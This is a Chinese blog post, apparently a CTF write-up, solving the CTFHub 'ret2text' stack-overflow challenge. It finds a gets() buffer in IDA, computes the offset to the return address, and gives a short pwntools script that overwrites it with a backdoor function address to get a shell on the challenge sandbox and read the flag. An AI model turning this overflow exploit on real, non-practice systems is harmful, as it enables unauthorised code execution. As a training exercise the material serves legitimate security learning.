ctfhub 技能树pwn 栈溢出 ret2text

1.先checksec

 可以看到无任何的栈保护

2.IDA查看

查看main函数

 看到gets危险函数,再点开其中的v4

 看到v4这个变量的缓冲区,我们要把数据溢出到覆盖返回地址,即0x70+8

再shift+f12 直接查看相关字符

发现后门函数

 选中该行,看到下方的地址(4007B8)

编写exp.py

先vim a.py

添加如下代码

from pwn import *

p=remote("challenge-eaf789c6962da157.sandbox.ctfhub.com",32331) #ip加端口号

payload=b'a'*0x70+b'abcdefgh'+p64(0x4007B8) #b表示该字符串为byte单位;后面的“abcdefgh”为垃圾数据,随便编写,只要满足八字节;p64表示以64位打包

p.sendline(payload)

p.interactive()

 输入:wq 保存退出

运行shell

python3 a.py

ls

cat flag

 即可得flag

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

wbxlzd

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值